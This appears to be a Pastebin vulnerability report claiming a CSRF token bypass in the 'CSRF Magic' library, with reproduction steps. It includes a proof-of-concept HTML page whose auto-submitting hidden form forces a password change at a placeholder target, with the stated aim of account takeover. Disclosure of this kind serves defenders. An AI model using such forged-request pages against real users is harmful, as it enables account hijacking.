CSRF Magic Library
ghost_fh Nov 14th, 2019 268 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- CSRF Magic Library
- Issue:- CSRF vulnerability.
- Vulnerability Description :- The CSRF Magic is vulnerable to CSRF protection bypass as it allows to
- tamper the csrf token values . Due to this flaw an remote attacker can exploit this vulnerability by
- crafting the malicious page and disperses it to the victim via social engineering ways enticing them to
- click the link. Once the user/victim clicks the `try again` button, attacker can takeover the account and
- perform untintended actions on vitim’s behalf.
- Steps to Reproduce :-
- 1. Create a malicious page containing the below values.
- <!DOCTYPE html>
- <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
- <form id="myForm" action="https://target.com/password_change.php" method="POST">
- <input type=hidden name="password" value=”secret”>
- <input type=hidden name=”conformed_password” value="secret">
- 2. Once cliked on the "Try again" button attack will get executed by asking password change.
RAW Paste Data